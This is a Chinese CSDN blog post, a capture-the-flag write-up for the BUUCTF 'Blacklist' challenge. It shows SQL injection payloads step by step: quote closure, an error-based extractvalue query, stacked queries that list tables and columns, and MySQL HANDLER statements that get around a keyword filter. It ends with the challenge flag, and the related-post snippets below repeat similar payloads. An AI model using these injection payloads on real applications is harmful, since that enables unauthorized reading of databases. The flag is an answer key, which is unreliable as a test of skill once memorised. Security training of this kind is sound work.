buuctf blacklist

最新推荐文章于 2023-03-29 20:21:03 发布
最新推荐文章于 2023-03-29 20:21:03 发布
阅读量290 收藏 1
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/124974684
版权

这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1'

使用联合查询,构造payload:

?inject=1' union select 1,2--+

过滤了许多东西:

/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i

其中的select被过滤掉了

尝试使用报错注入进行突破:

?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+

 得到数据库:supersqli

由于过滤掉了insert和delete,我们无法使用报错注入,尝试使用堆叠注入进行突破

?inject=-1';use supersqli;show tables--+

发现了两个表,猜测flag在flaghere里面,接下来查字段

?inject=-1';use supersqli;show columns from FlagHere--+

看到了字段flag

用handle读取

这里的handle语句和select查询语句都可以在mysql中查询想要的东西

基本语句是

通过HANDLER tbl_name OPEN打开一张表,无返回结果。

通过HANDLER tbl_name READ FIRST获取tbl_name的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的tbl_name。
 

?inject=1';handler FlagHere open;handler FlagHere read first--+

flag{0e61116e-dd99-49ec-ba01-5537cec1a996}
ANYOUZHEN
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3968
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
每天一道ctf
whisper921的博客
10-20 1351
ctf题
CTF通关录
0XAXSDD的博客
05-09 257
CTF通关录-warmup 往常一样打开题目 得到一个这个 这个表情包,卧槽,好猥琐!!!! 当然我知道,这肯定是迷惑我们,源码看一波: 果然,有玄机,source.php 访问一下 好的,又是一波源码审计,还好不是js,不然头大得很 简单的描述一下,这又是一个文件包含的php文件,可以传入参数file 但是这个是白名单,可以看到白名单里有个hint.php 尝试搞一下咯 可恶!!!!,虽然不是flag,但是也给出了提示了flag在这个文件ffffllllaaaagggg 那么怎么才能绕过这个白名
BUUCTF-Blacklist
m0_47571887的博客
11-10 674
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
buuctf部分题目wp
zhhhb1005的博客
06-19 1063
主要是记录平时做题遇见的没见过的题目
Quick-Blacklist
06-15
快速黑名单 一个轻量级实用程序,用于将玩家和库存中的项目列入黑名单。
cpf_blacklist
02-08
cpf_blacklist
android_system_blacklist_android_msm8610_
10-03
msm8610 android system
buuctf-Blacklist
m0_62094846的博客
03-28 653
?inject=1' order by 2--+ 过滤了很多关键词,就有select,好像绕不过 试试报错注入 ?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+ 数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了 堆叠注入 ?inject=-1';use supersqli;show tables--+ 查出两个表:FlagHere,words 接下来查字段...
Buuctf [GYCTF2020]Blacklist
qq_53030229的博客
10-26 208
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、检查源码2、使用堆叠注入1、判断是否存在注入点2、使用堆叠注入3、获取flag 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2348
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
buuctf:blacklistp
fcz___的博客
03-29 117
所以我们payload:?inject=1’;可以看到有一个flag字段。但是select被过滤了。我们用handler读取。再知道表名是,可以用handler读取数据。往下的话就不能用sqlmap了因为有waf,我不会绕,我们手工注入。可以看到应该是sql注入。我们用sqlmap扫描一下。已经知道数据库了,我们采用堆叠注入。可以看到存在注入点。
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1612
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2413
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
[GYCTF2020]Blacklist 1
m0_73728268的博客
03-15 369
2.继续构造payload,1’ or 1=1#,确定了闭合方式。使用接下来的语句 1’;1.感觉像是一种注入,blacklist黑名单绕过。更具一系列操作可以判断出闭合方式为。handler函数运用。
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 437
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
blacklist.conf
最新发布
09-06
blacklist.conf是一个配置文件,用于在Nginx服务器中设置黑名单。可以通过在nginx.conf文件中添加`include /usr/local/nginx/conf/blacklist.conf;`来引入blacklist.conf文件。 在blacklist.conf文件的最后部分,可以插入以下两行内容来禁用nouveau驱动的选项:`blacklist nouveau options nouveau modeset=0`。 另外,如果想要禁用树莓派上的Pi插Kong输入,可以编辑`/etc/modprobe.d/alsa-blacklist.conf`文件,并添加`blacklist snd_bcm2835`一行。然后,需要重新配置音频设备的索引,可以编辑`/lib/modprobe.d/aliases.conf`文件,并更改`options snd-usb-audio index...`所在行的配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [nginx 加ip黑名单](https://blog.csdn.net/weixin_43275578/article/details/128966558)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ubuntu16.04Nvidia驱动、CUDA、cuDNN安装与卸载](https://blog.csdn.net/u013898698/article/details/119000021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [piloopdrumbox:Raspberry pi +鼓垫+循环站](https://download.csdn.net/download/weixin_42115513/15186998)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值